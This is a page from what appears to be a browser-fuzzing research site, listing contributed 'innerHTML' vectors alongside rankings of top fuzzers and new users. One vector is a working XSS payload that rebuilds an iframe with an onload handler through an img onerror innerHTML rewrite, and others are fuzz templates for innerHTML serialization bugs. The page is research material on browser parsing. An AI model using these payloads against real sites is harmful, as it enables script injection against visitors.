Featured vector

No vectors found in the last 30 days

Fuzz vector cloud

3,406,299 Successful fuzzes

Fuzz Vectors

Searching for "innerHTML"

Your browser identified as

General Crawlers unknown

All vectors

Description	Vector	Created by
incorrect innerHTML serialization	<datahtmlelements><</datahtmlelements> <datahtmlelements/><</datahtmlelements>	@garethheyes
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket	<body> §iframe onload=confirm(/xss/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> urlenc	@secalert
Single character breaking innerHTML copy	<div id="fuzzelementnum"> <div title="chrstyle=color:#FF1133;" id="copyTargetnum">num - test</div> </div>	@thewildcat
Entity character breaking innerHTML copy	<div id="fuzzelementnum"> <div title="&#xhex6;style=color:#FF1133" id="copyTargetnum">num - test</div> </div>	@thewildcat
Characters breaking innerHTML copy	<div id="fuzzelementnum"> <div title="chrchrstyle=color:#FF1133" id="copyTargetnum">num - test</div> </div>	@thewildcat

Top fuzzers
insertScript (735)
garethheyes (256)
i_bo0om (51)
0x6D6172696F (51)
JohnathanKuskos (46)
heyheyheyhey10 (43)
tifkin_ (42)
palindrom (38)
jackmasa (35)
Giutro (35)
albinowax (33)
0xAli (33)
avlidienbrunn (30)
mramydnei1 (24)
Lamp_AE (22)
peksa (21)
skeptic_fx (19)
D_Szameitat (19)
irsdl (18)
ahpaleus (18)

New users
Pav_Kirill
nlf41188
hacker_
D_K_Dev
JasonW67174798
guillpv
p2hm1n
lvbaosheng
script92538206
mandeex2
Yang_Luchan
0xRadi
h0nde
HansMoeller82
AbdulConsole
bugbounduk
IvanBiagi1
dlinklalala
igc_iv
FIabber

Popular recent vectors
testerdd
test23
testfgdfgdf

Latest vectors
testerdd
testfgdfgdf
test23
script tag fuxx
Tags with JS capable Events
Tags with Onerror
Characters that can go on either side of in attribute
Valid HTML Attribute Seperators
Unicode characters that normalize to a dot in URLs
test2

© 2020 Copyright Gareth Heyes